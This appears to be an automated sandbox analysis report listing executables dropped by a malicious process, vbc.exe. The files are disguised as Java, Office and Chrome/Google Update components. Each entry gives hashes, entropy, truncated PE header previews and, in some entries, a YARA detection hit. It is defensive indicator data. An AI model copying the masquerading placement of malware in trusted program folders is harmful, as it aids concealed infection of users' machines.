C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe Download File
Process:	C:\Users\Public\vbc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	628760
Entropy (8bit):	6.610692588378696
Encrypted:	false
SSDEEP:	12288:xBzcmhiNfK5m+JppVQOPM7Xm3OOLnycn6PwxTsU4umHNbkwg/HDNuoU7:xBomhiNfK5nppV5iMxnx6PmTF4uSNbkI
MD5:	58D7973ED6A0B9CB88AE9629AD24F476
SHA1:	B0A19FEBB8CCDF25F99FF224A3CFA6C1CE767C51
SHA-256:	716474A84FE887765D219EE9F0C01E6862131B575860A3BB08A87B708AD96BC6
SHA-512:	D33B617F707CA17CFBCFE02EC9D5A8F8419EDC626803F18AEBD1A83EE103C0DA28CE0A72656B05BE1868EB3D02082C6795C9B88AF53725FA63C7FDCD6F333523
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a..............0..f..........r.... ........@.. ....................................@................................. ...O.......p............................................................................ ............... ..H............text....e... ...f.................. ..`.rsrc...p............h..............@..@.reloc...............p..............@..B................T.......H........H..T!...........j.. .............................................s....}.....s ...}.....(!....(.....{.....o"....0...........(......}.....-...}....+T.{.....o#...o$...,...{.....o#...o%...}....+(.s&...}.....{.....o#....{....o'....(.....{....,6.{....o(....+...()......(......(...-...........o.......................{....o+....{....o,...o-.....}.....0..)........{.........(....t......\|......(...+...3.....0..)........{.........(0...t......\|......(...+...3.....0..........

C:\Program Files (x86)\Common Files\microsoft shared\TextConv\WksConv\Wkconv.exe Download File
Process:	C:\Users\Public\vbc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1240480
Entropy (8bit):	6.579038255428591
Encrypted:	false
SSDEEP:	24576:xBomhiOUOXAoyQy+gCgbKisSzGpMjmkNmAsEUwN1f:xBom8t5QrgCMKisijmk0AGwN5
MD5:	97F1A67C60EAF223A7196D7DCCDC8CA8
SHA1:	BD0D164699258EEDFB670E8AB76D3E37C1365CD1
SHA-256:	1D550807E0593695F818C936E471DE732B15A20A03FCAF999D62226784A15EAE
SHA-512:	727D6DBFEA1DB6BCA6E9DB0AA9F7F39FF61A5BF6226F8A8CD89941F9AA0014236D01AE74A603C5FAE8576C8A339A759CA9BF64756C0ACBBA02467C924097473C
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a..............0..f..........r.... ........@.. ....................................@................................. ...O.......p............................................................................ ............... ..H............text....e... ...f.................. ..`.rsrc...p............h..............@..@.reloc...............p..............@..B................T.......H........H..T!...........j.. .............................................s....}.....s ...}.....(!....(.....{.....o"....0...........(......}.....-...}....+T.{.....o#...o$...,...{.....o#...o%...}....+(.s&...}.....{.....o#....{....o'....(.....{....,6.{....o(....+...()......(......(...-...........o.......................{....o+....{....o,...o-.....}.....0..)........{.........(....t......\|......(...+...3.....0..)........{.........(0...t......\|......(...+...3.....0..........

C:\Program Files (x86)\Common Files\microsoft shared\VSTO\10.0\VSTOInstaller.exe Download File
Process:	C:\Users\Public\vbc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	128856
Entropy (8bit):	6.125428672639373
Encrypted:	false
SSDEEP:	3072:xBRBcmh7b1I42KyB0QRkTP+c2Bx95fpUHGZo5OiLXpWJwU:xBRBcmh7bCLRkR25E15dLXpWJwU
MD5:	43918E9BB48D540BEAD7071132A7D5AE
SHA1:	E2DC0107C690154F3D71836D4A2A74A46CD00D51
SHA-256:	65A3E4D3D89DDE6055AF7411E96A038C05AEA5CADE3E1DE0C341E95956EBE7C0
SHA-512:	EEB23457D2BDBF5C6AE691C6A6B4150C81B68C2360F5966AB2097DB897519908F1BAE682F09CF0338BD33D776298C2D38E23775085378174659D6369A07A0774
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a..............0..f..........r.... ........@.. ....................................@................................. ...O.......p............................................................................ ............... ..H............text....e... ...f.................. ..`.rsrc...p............h..............@..@.reloc...............p..............@..B................T.......H........H..T!...........j.. .............................................s....}.....s ...}.....(!....(.....{.....o"....0...........(......}.....-...}....+T.{.....o#...o$...,...{.....o#...o%...}....+(.s&...}.....{.....o#....{....o'....(.....{....,6.{....o(....+...()......(......(...-...........o.......................{....o+....{....o,...o-.....}.....0..)........{.........(....t......\|......(...+...3.....0..)........{.........(0...t......\|......(...+...3.....0..........

C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.135\Installer\chrmstp.exe Download File
Process:	C:\Users\Public\vbc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	2361840
Entropy (8bit):	6.494367846093203
Encrypted:	false
SSDEEP:	49152:xBom8feWvsxXgsirVYXwiAP/P9TZ7krsuHhTZb:whMZakLHv
MD5:	0A009E0622A22DDFB1851F43BE6AD36F
SHA1:	DE6E9424706095C6D205DCFFBD237245BC239704
SHA-256:	AABAB742D8090A478379C6A56A4C111172C2FCF35336FFE76FB7ED43452792D8
SHA-512:	844143FF288E8F734D0C4C31C5AD6B55A6626615CE9E61611AA9C9F2F497B45E0B025638CD6FB0B2A0975DE3FAAEB8A376D4403C5217911434FE8B8C6501E5F7
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a..............0..f..........r.... ........@.. ....................................@................................. ...O.......p............................................................................ ............... ..H............text....e... ...f.................. ..`.rsrc...p............h..............@..@.reloc...............p..............@..B................T.......H........H..T!...........j.. .............................................s....}.....s ...}.....(!....(.....{.....o"....0...........(......}.....-...}....+T.{.....o#...o$...,...{.....o#...o%...}....+(.s&...}.....{.....o#....{....o'....(.....{....,6.{....o(....+...()......(......(...-...........o.......................{....o+....{....o,...o-.....}.....0..)........{.........(....t......\|......(...+...3.....0..)........{.........(0...t......\|......(...+...3.....0..........

C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.135\Installer\setup.exe Download File
Process:	C:\Users\Public\vbc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	2361840
Entropy (8bit):	6.494367846093203
Encrypted:	false
SSDEEP:	49152:xBom8feWvsxXgsirVYXwiAP/P9TZ7krsuHhTZb:whMZakLHv
MD5:	0A009E0622A22DDFB1851F43BE6AD36F
SHA1:	DE6E9424706095C6D205DCFFBD237245BC239704
SHA-256:	AABAB742D8090A478379C6A56A4C111172C2FCF35336FFE76FB7ED43452792D8
SHA-512:	844143FF288E8F734D0C4C31C5AD6B55A6626615CE9E61611AA9C9F2F497B45E0B025638CD6FB0B2A0975DE3FAAEB8A376D4403C5217911434FE8B8C6501E5F7
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a..............0..f..........r.... ........@.. ....................................@................................. ...O.......p............................................................................ ............... ..H............text....e... ...f.................. ..`.rsrc...p............h..............@..@.reloc...............p..............@..B................T.......H........H..T!...........j.. .............................................s....}.....s ...}.....(!....(.....{.....o"....0...........(......}.....-...}....+T.{.....o#...o$...,...{.....o#...o%...}....+(.s&...}.....{.....o#....{....o'....(.....{....,6.{....o(....+...()......(......(...-...........o.......................{....o+....{....o,...o-.....}.....0..)........{.........(....t......\|......(...+...3.....0..)........{.........(0...t......\|......(...+...3.....0..........

C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.135\chrome_pwa_launcher.exe Download File
Process:	C:\Users\Public\vbc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1048560
Entropy (8bit):	6.224679723187972
Encrypted:	false
SSDEEP:	12288:xBzcmhio1qgAxmEW/Wpb879sOfkpuFLQAt7diX3WeR5+nzHoXrwKA4N7RpE:xBomhinxmEFpY+8FLQA1dtoOIA
MD5:	A5BC063678CD8FA1011F5EC31E2BED12
SHA1:	D74599EAF186A54E9F94016123B52D6CEFDB3202
SHA-256:	9B33376A0DF9E910013C184AC2AE547336C54F8C986BCCC8FD5F094840EF6FDF
SHA-512:	86A3BB92284A6E02BECF78391F5EA45485117C850D35BABA1B108F14E99E0D221E44E9A031C4C40253709B1E4AAF63CA79540419A718EE1C65CC4F0685E2EA61
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a..............0..f..........r.... ........@.. ....................................@................................. ...O.......p............................................................................ ............... ..H............text....e... ...f.................. ..`.rsrc...p............h..............@..@.reloc...............p..............@..B................T.......H........H..T!...........j.. .............................................s....}.....s ...}.....(!....(.....{.....o"....0...........(......}.....-...}....+T.{.....o#...o$...,...{.....o#...o%...}....+(.s&...}.....{.....o#....{....o'....(.....{....,6.{....o(....+...()......(......(...-...........o.......................{....o+....{....o,...o-.....}.....0..)........{.........(....t......\|......(...+...3.....0..)........{.........(0...t......\|......(...+...3.....0..........

C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.135\elevation_service.exe Download File
Process:	C:\Users\Public\vbc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1351152
Entropy (8bit):	6.570213271517427
Encrypted:	false
SSDEEP:	24576:xBomhicPSlMPVrw6BnRJERaRg51cj71FM8sY2qUO80f+Thfc42v5yj:xBom8cUMPTJcRaK1cv1FM8srO87TZcDY
MD5:	1B212CA15F82C549F5EA62EAD138CDB5
SHA1:	E245794DB23A804141961145A9EEC5280BFB5AC3
SHA-256:	23C154C8BA72DD2959F4DE192A4E35F160DCB3D2BF4B8653D665637070F5D16E
SHA-512:	25C7459FEFCB38B185F7C3122C20929BD4B386072D9C54C5055B23E22303F1115602A7665250F34C73C818A09D553A9373122BD4D12595F25B73122D447D2738
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a..............0..f..........r.... ........@.. ....................................@................................. ...O.......p............................................................................ ............... ..H............text....e... ...f.................. ..`.rsrc...p............h..............@..@.reloc...............p..............@..B................T.......H........H..T!...........j.. .............................................s....}.....s ...}.....(!....(.....{.....o"....0...........(......}.....-...}....+T.{.....o#...o$...,...{.....o#...o%...}....+(.s&...}.....{.....o#....{....o'....(.....{....,6.{....o(....+...()......(......(...-...........o.......................{....o+....{....o,...o-.....}.....0..)........{.........(....t......\|......(...+...3.....0..)........{.........(0...t......\|......(...+...3.....0..........

C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.135\notification_helper.exe Download File
Process:	C:\Users\Public\vbc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	928752
Entropy (8bit):	6.520349184048029
Encrypted:	false
SSDEEP:	12288:xBzcmhioP0rdhn37FA9bdpFe00sInBwzONqnuC6Jr4sDCSvCevGKseR5+n8ohxpW:xBomhiDl37ab75bI+OMLuCSvScSxoTX
MD5:	56C5D7EC0974F1D13EBE78B35BAEC460
SHA1:	E20B11673AECC7050FD877DC393B7536C4994F8E
SHA-256:	3119B3E71BF8D7F59370E301AABBB4B978C77DA74A66E1CBB02EBBFBE5048F98
SHA-512:	06EB3535CF90ADD3A34BF583CAB50CA1C45DA1D8262FE4F916B5F67F7D2ED985E0BAD90ACF59ED1976C5F3BDACAA14735FA8A17C89985291CC705F8C4808AA57
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a..............0..f..........r.... ........@.. ....................................@................................. ...O.......p............................................................................ ............... ..H............text....e... ...f.................. ..`.rsrc...p............h..............@..@.reloc...............p..............@..B................T.......H........H..T!...........j.. .............................................s....}.....s ...}.....(!....(.....{.....o"....0...........(......}.....-...}....+T.{.....o#...o$...,...{.....o#...o%...}....+(.s&...}.....{.....o#....{....o'....(.....{....,6.{....o(....+...()......(......(...-...........o.......................{....o+....{....o,...o-.....}.....0..)........{.........(....t......\|......(...+...3.....0..)........{.........(0...t......\|......(...+...3.....0..........

C:\Program Files (x86)\Google\Chrome\Application\chrome.exe Download File
Process:	C:\Users\Public\vbc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1862128
Entropy (8bit):	6.654511402306602
Encrypted:	false
SSDEEP:	24576:xBomhiGuWOgCPLdX/JmrLAWZ71C6/63V1b2vxB7xT2fWR0oimT:xBom8xWO/PLTuLrZpCnF1Kv/lTImT
MD5:	0B6361EFC18094FC9C09E57BB1E16D34
SHA1:	D15C74BB3F5224EB017831C00EC152D03AAE1195
SHA-256:	E82D04C26723C5E27BA95DB27F64AC073C0142C5A4A26B52AF88F38EAE36360C
SHA-512:	D13B41484CEED00CDAAEF869E53B83D71E1BDD60F9454A3A85DC69C52B4772EE8267D1B716BB850176B529209EB222869F1C0870C8AFD17D3B086E6A2B22F786
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a..............0..f..........r.... ........@.. ....................................@................................. ...O.......p............................................................................ ............... ..H............text....e... ...f.................. ..`.rsrc...p............h..............@..@.reloc...............p..............@..B................T.......H........H..T!...........j.. .............................................s....}.....s ...}.....(!....(.....{.....o"....0...........(......}.....-...}....+T.{.....o#...o$...,...{.....o#...o%...}....+(.s&...}.....{.....o#....{....o'....(.....{....,6.{....o(....+...()......(......(...-...........o.......................{....o+....{....o,...o-.....}.....0..)........{.........(....t......\|......(...+...3.....0..)........{.........(0...t......\|......(...+...3.....0..........

C:\Program Files (x86)\Google\Chrome\Application\chrome_proxy.exe Download File
Process:	C:\Users\Public\vbc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	746480
Entropy (8bit):	6.536325316141131
Encrypted:	false
SSDEEP:	12288:xBzcmhiVe2qxRGd421TIkvZYqm8gphnOC2qFjU+eR5+nSopOlXvziLE:xBomhitq2d1TIkvKJOCRezXb3
MD5:	9DA46CA3E8AEA1D13DD5985605768678
SHA1:	528502AA6AF09FBD09A138672EA7B31EEF06111E
SHA-256:	025F1DD7CC77CC147F4C4FD235F18038802376BE17147BC4B2BC8DC18571A3CA
SHA-512:	E65977E6F93133EE80240C039806AA1F5511C8B1E29A5AA1E25ACDBD0125728C88871FB8A0533C9347E6B66A5C6FA1B43CE92B537FEBF373F81A083B0D48B0C6
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a..............0..f..........r.... ........@.. ....................................@................................. ...O.......p............................................................................ ............... ..H............text....e... ...f.................. ..`.rsrc...p............h..............@..@.reloc...............p..............@..B................T.......H........H..T!...........j.. .............................................s....}.....s ...}.....(!....(.....{.....o"....0...........(......}.....-...}....+T.{.....o#...o$...,...{.....o#...o%...}....+(.s&...}.....{.....o#....{....o'....(.....{....,6.{....o(....+...()......(......(...-...........o.......................{....o+....{....o,...o-.....}.....0..)........{.........(....t......\|......(...+...3.....0..)........{.........(0...t......\|......(...+...3.....0..........

C:\Program Files (x86)\Google\Update\1.3.36.102\GoogleCrashHandler.exe Download File
Process:	C:\Users\Public\vbc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	341064
Entropy (8bit):	6.59362752077256
Encrypted:	false
SSDEEP:	6144:xBRBcmh7bC38UjKsstilj6BYbVxsw7Rm3dAOfj2qbrQaMx+NBkkYtGnpZ:xBzcmhi38diZ6BY/rwpj2orux+NBk1tw
MD5:	761A55ECFDBB497835C1F50FF8678C91
SHA1:	1AD431F4A4343283BC08A533AD8D8A07F2266A96
SHA-256:	149F5FED83939CA88AE455D34696AB2B80C14C957D9048DCDD069F6794E41CD8
SHA-512:	0EDDAE606FC94F74CBA71A0C3EB9BF6F728705D751DFB3BCE09E707AFD8692DC50DA8C0E0F088A2050D277A168442F7F04135AAB2F101D975895EED07C250B65
Malicious:	true
Yara Hits:	Rule: SUSP_Unsigned_GoogleUpdate, Description: Detects suspicious unsigned GoogleUpdate.exe, Source: C:\Program Files (x86)\Google\Update\1.3.36.102\GoogleCrashHandler.exe, Author: Florian Roth
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a..............0..f..........r.... ........@.. ....................................@................................. ...O.......p............................................................................ ............... ..H............text....e... ...f.................. ..`.rsrc...p............h..............@..@.reloc...............p..............@..B................T.......H........H..T!...........j.. .............................................s....}.....s ...}.....(!....(.....{.....o"....0...........(......}.....-...}....+T.{.....o#...o$...,...{.....o#...o%...}....+(.s&...}.....{.....o#....{....o'....(.....{....,6.{....o(....+...()......(......(...-...........o.......................{....o+....{....o,...o-.....}.....0..)........{.........(....t......\|......(...+...3.....0..)........{.........(0...t......\|......(...+...3.....0..........

C:\Program Files (x86)\Google\Update\1.3.36.102\GoogleCrashHandler64.exe Download File
Process:	C:\Users\Public\vbc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	421960
Entropy (8bit):	6.340015892192738
Encrypted:	false
SSDEEP:	12288:xBzcmhijk+0X8C/PBNNomwoGr3qax+rZI5u:xBomhijo8C3BNNHfGr3txMOU
MD5:	CDF657333420D1BE1EDD867523299AAA
SHA1:	C287F786E6A7B0AFD146CEC9C65B6484DDA40E70
SHA-256:	3EF91DAC16AA55040272F71C654B4361CAD234AEA3DB4FE1C1BA305B7DD9EEB5
SHA-512:	7E3719855E9E87542101FA313078A78B241E9DDA43FA8252BB5F589C4ACD346CC146C9CBEC6A6B84704A55864280D5EA7174556739B0AC8EDFC8257AE9E2D562
Malicious:	true
Yara Hits:	Rule: SUSP_Unsigned_GoogleUpdate, Description: Detects suspicious unsigned GoogleUpdate.exe, Source: C:\Program Files (x86)\Google\Update\1.3.36.102\GoogleCrashHandler64.exe, Author: Florian Roth
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a..............0..f..........r.... ........@.. ....................................@................................. ...O.......p............................................................................ ............... ..H............text....e... ...f.................. ..`.rsrc...p............h..............@..@.reloc...............p..............@..B................T.......H........H..T!...........j.. .............................................s....}.....s ...}.....(!....(.....{.....o"....0...........(......}.....-...}....+T.{.....o#...o$...,...{.....o#...o%...}....+(.s&...}.....{.....o#....{....o'....(.....{....,6.{....o(....+...()......(......(...-...........o.......................{....o+....{....o,...o-.....}.....0..)........{.........(....t......\|......(...+...3.....0..)........{.........(0...t......\|......(...+...3.....0..........

C:\Program Files (x86)\Google\Update\1.3.36.102\GoogleUpdate.exe Download File
Process:	C:\Users\Public\vbc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	197704
Entropy (8bit):	5.960797310819697
Encrypted:	false
SSDEEP:	3072:xBRBcmh7b1I4hiTOZQvfSERdX9Zk8AtB+olkH3yfQW5qjJvKZxU5poeJY++pp9u0:xBRBcmh7bCJjRsB+to7x9
MD5:	C05B20BDA3C180C5E351B87FD4DC4875
SHA1:	AF3CB6707D9A6594E9DC9820BA2A0D2332314C70
SHA-256:	515ACCCEEEB07757178A45B7D31EE65861266DE36284BDA30DEF5A8C425C22DD
SHA-512:	29E09C99EBEB0FF85F8EF5B627BE6368B8A3FEBE5F6D36BD138AFFA794F90BBB71153B7B9EBF7360D1CC2CFC8C97ABBC3F94C344895018A3DB88A02325B9E0D5
Malicious:	true
Yara Hits:	Rule: SUSP_Unsigned_GoogleUpdate, Description: Detects suspicious unsigned GoogleUpdate.exe, Source: C:\Program Files (x86)\Google\Update\1.3.36.102\GoogleUpdate.exe, Author: Florian Roth
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a..............0..f..........r.... ........@.. ....................................@................................. ...O.......p............................................................................ ............... ..H............text....e... ...f.................. ..`.rsrc...p............h..............@..@.reloc...............p..............@..B................T.......H........H..T!...........j.. .............................................s....}.....s ...}.....(!....(.....{.....o"....0...........(......}.....-...}....+T.{.....o#...o$...,...{.....o#...o%...}....+(.s&...}.....{.....o#....{....o'....(.....{....,6.{....o(....+...()......(......(...-...........o.......................{....o+....{....o,...o-.....}.....0..)........{.........(....t......\|......(...+...3.....0..)........{.........(0...t......\|......(...+...3.....0..........

C:\Program Files (x86)\Google\Update\1.3.36.102\GoogleUpdateBroker.exe Download File
Process:	C:\Users\Public\vbc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	142920
Entropy (8bit):	6.3603795291869245
Encrypted:	false
SSDEEP:	3072:xBRBcmh7b1I46iI73i6QEs+B+fQNKMSCMYgh2Bh1c27YX:xBRBcmh7bCSu++B+4cMS0gM8
MD5:	56B8E9D4A33EC6639EBCB1A30DB0ACBF
SHA1:	9D134D7F582A452C13A7280D3E0F00DDE4C79FA7
SHA-256:	FE985104A950EC3C867C4A89AC995C0762A5DD50787E746D769F3EB8E2E5B452
SHA-512:	D475572A65CB95D26586434613EE5DA97C0EC13F352160760A5E0F466897D70290D0D275679A76A691F641DF31DD57DEDDA73B9B9B85BBEB264B38EAFCEDBDB9
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a..............0..f..........r.... ........@.. ....................................@................................. ...O.......p............................................................................ ............... ..H............text....e... ...f.................. ..`.rsrc...p............h..............@..@.reloc...............p..............@..B................T.......H........H..T!...........j.. .............................................s....}.....s ...}.....(!....(.....{.....o"....0...........(......}.....-...}....+T.{.....o#...o$...,...{.....o#...o%...}....+(.s&...}.....{.....o#....{....o'....(.....{....,6.{....o(....+...()......(......(...-...........o.......................{....o+....{....o,...o-.....}.....0..)........{.........(....t......\|......(...+...3.....0..)........{.........(0...t......\|......(...+...3.....0..........

C:\Program Files (x86)\Google\Update\1.3.36.102\GoogleUpdateComRegisterShell64.exe Download File
Process:	C:\Users\Public\vbc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	223816
Entropy (8bit):	6.0691435126689255
Encrypted:	false
SSDEEP:	6144:xBRBcmh7bCcPuQaNz8KLohDb9hIPXe0krD:xBzcmhiYuQqwEopJiPvkP
MD5:	85D45795D13D8046945B7B91EAE979CD
SHA1:	F24AEB64154B4F05FF6372C6F80CBF52E6A54CA7
SHA-256:	7AA5A99F20B59F2A186E356BB5496BD410735742FA219BAD0175FAEEB46DD38B
SHA-512:	DF9912BEAA64815A5DC960FB78CE1A0969A44E953DA35027BEC26683C134ECAF9DFFB6DC6DD64BA5C28AEF3606A5409A88C26215EC40CAA3144ACB3F1FB6863F
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a..............0..f..........r.... ........@.. ....................................@................................. ...O.......p............................................................................ ............... ..H............text....e... ...f.................. ..`.rsrc...p............h..............@..@.reloc...............p..............@..B................T.......H........H..T!...........j.. .............................................s....}.....s ...}.....(!....(.....{.....o"....0...........(......}.....-...}....+T.{.....o#...o$...,...{.....o#...o%...}....+(.s&...}.....{.....o#....{....o'....(.....{....,6.{....o(....+...()......(......(...-...........o.......................{....o+....{....o,...o-.....}.....0..)........{.........(....t......\|......(...+...3.....0..)........{.........(0...t......\|......(...+...3.....0..........

C:\Program Files (x86)\Google\Update\1.3.36.102\GoogleUpdateCore.exe Download File
Process:	C:\Users\Public\vbc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	265288
Entropy (8bit):	6.568607674832219
Encrypted:	false
SSDEEP:	6144:xBRBcmh7bC/5ddxo1RJI66P2PRvHAOGVlY9rIXx+fgpnox+/j:xBzcmhi/5dXoPi6HElWrCx+fgpnA+/j
MD5:	FA830E81D1BF52A89010E9C36080C06D
SHA1:	614AC089868FE37E11E80F946CE056042742F7B4
SHA-256:	E0A0C09BF2EDD0A29149B1093E59EDE8CA31AD216AD073611E9F9A4BA3847287
SHA-512:	4D35D3FE1BF7A59905F1DD13EA7DEDCEDE5AA00DE4DEE360DB15D5ADC7B5AEA1D37F5EB76C08A945554B3B70191B78E0D848F0EB890AD9CFCF5D23715ADB55E4
Malicious:	true
Yara Hits:	Rule: SUSP_Unsigned_GoogleUpdate, Description: Detects suspicious unsigned GoogleUpdate.exe, Source: C:\Program Files (x86)\Google\Update\1.3.36.102\GoogleUpdateCore.exe, Author: Florian Roth
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a..............0..f..........r.... ........@.. ....................................@................................. ...O.......p............................................................................ ............... ..H............text....e... ...f.................. ..`.rsrc...p............h..............@..@.reloc...............p..............@..B................T.......H........H..T!...........j.. .............................................s....}.....s ...}.....(!....(.....{.....o"....0...........(......}.....-...}....+T.{.....o#...o$...,...{.....o#...o%...}....+(.s&...}.....{.....o#....{....o'....(.....{....,6.{....o(....+...()......(......(...-...........o.......................{....o+....{....o,...o-.....}.....0..)........{.........(....t......\|......(...+...3.....0..)........{.........(0...t......\|......(...+...3.....0..........

C:\Program Files (x86)\Google\Update\1.3.36.102\GoogleUpdateOnDemand.exe Download File
Process:	C:\Users\Public\vbc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	142920
Entropy (8bit):	6.360668453723562
Encrypted:	false
SSDEEP:	3072:xBRBcmh7b1I4BiI73i6Qis+B+fQSKMUC7asZmGkh182jYX:xBRBcmh7bC5ug+B+4RMUXsMU
MD5:	2862ACF5B9CD66DB1843B8A79BCEFD64
SHA1:	358529240DDD7154B8A612F97035588DC2FFF8CA
SHA-256:	ED84F6832D444D877EDFF1E3ED7990F701E5B9F7AE6D11F51983EBC87D63255D
SHA-512:	A6AF16412F21971D422251853FB9F9C88682DEA1694B47FB44236DFB1FAEF47D5FCECC2A446F3A1758A77342DF3C1AA0434FA98EF499BB3B27C653B0BF2656D6
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a..............0..f..........r.... ........@.. ....................................@................................. ...O.......p............................................................................ ............... ..H............text....e... ...f.................. ..`.rsrc...p............h..............@..@.reloc...............p..............@..B................T.......H........H..T!...........j.. .............................................s....}.....s ...}.....(!....(.....{.....o"....0...........(......}.....-...}....+T.{.....o#...o$...,...{.....o#...o%...}....+(.s&...}.....{.....o#....{....o'....(.....{....,6.{....o(....+...()......(......(...-...........o.......................{....o+....{....o,...o-.....}.....0..)........{.........(....t......\|......(...+...3.....0..)........{.........(0...t......\|......(...+...3.....0..........

C:\Program Files (x86)\Google\Update\1.3.36.102\GoogleUpdateSetup.exe Download File
Process:	C:\Users\Public\vbc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1383768
Entropy (8bit):	7.890253252370955
Encrypted:	false
SSDEEP:	24576:xBomhivuOx5SUXJW/D4xUa38vKdTIkpgSWC+osF0jzZVb+t35cMYlG96NMBJMncK:xBom8Bx5SUW/cxUitIGLsF0nb+tJVYlj
MD5:	8CA19D9F561569917EE382B55C4C7853
SHA1:	F1C0DC0CF107FF598E1E65B88754BC52057059A4
SHA-256:	7276D1DB9E4661810D6A80DE1813CC735E34D6BA6E1BA6FFBD3B87B8F608CDBA
SHA-512:	C0E180A68D1A4165225E6AD861594ABCAA761AA2AF93B5236DFB13A5772C59A7C1E8F734661FDB4C4E73F08F5875E87132ECDA435E6227193D7C953A658342D1
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a..............0..f..........r.... ........@.. ....................................@................................. ...O.......p............................................................................ ............... ..H............text....e... ...f.................. ..`.rsrc...p............h..............@..@.reloc...............p..............@..B................T.......H........H..T!...........j.. .............................................s....}.....s ...}.....(!....(.....{.....o"....0...........(......}.....-...}....+T.{.....o#...o$...,...{.....o#...o%...}....+(.s&...}.....{.....o#....{....o'....(.....{....,6.{....o(....+...()......(......(...-...........o.......................{....o+....{....o,...o-.....}.....0..)........{.........(....t......\|......(...+...3.....0..)........{.........(0...t......\|......(...+...3.....0..........

C:\Program Files (x86)\Google\Update\Download\{430FD4D0-B729-4F61-AA34-91526481799D}\1.3.36.102\GoogleUpdateSetup.exe Download File
Process:	C:\Users\Public\vbc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1383768
Entropy (8bit):	7.890253252370955
Encrypted:	false
SSDEEP:	24576:xBomhivuOx5SUXJW/D4xUa38vKdTIkpgSWC+osF0jzZVb+t35cMYlG96NMBJMncK:xBom8Bx5SUW/cxUitIGLsF0nb+tJVYlj
MD5:	8CA19D9F561569917EE382B55C4C7853
SHA1:	F1C0DC0CF107FF598E1E65B88754BC52057059A4
SHA-256:	7276D1DB9E4661810D6A80DE1813CC735E34D6BA6E1BA6FFBD3B87B8F608CDBA
SHA-512:	C0E180A68D1A4165225E6AD861594ABCAA761AA2AF93B5236DFB13A5772C59A7C1E8F734661FDB4C4E73F08F5875E87132ECDA435E6227193D7C953A658342D1
Malicious:	true
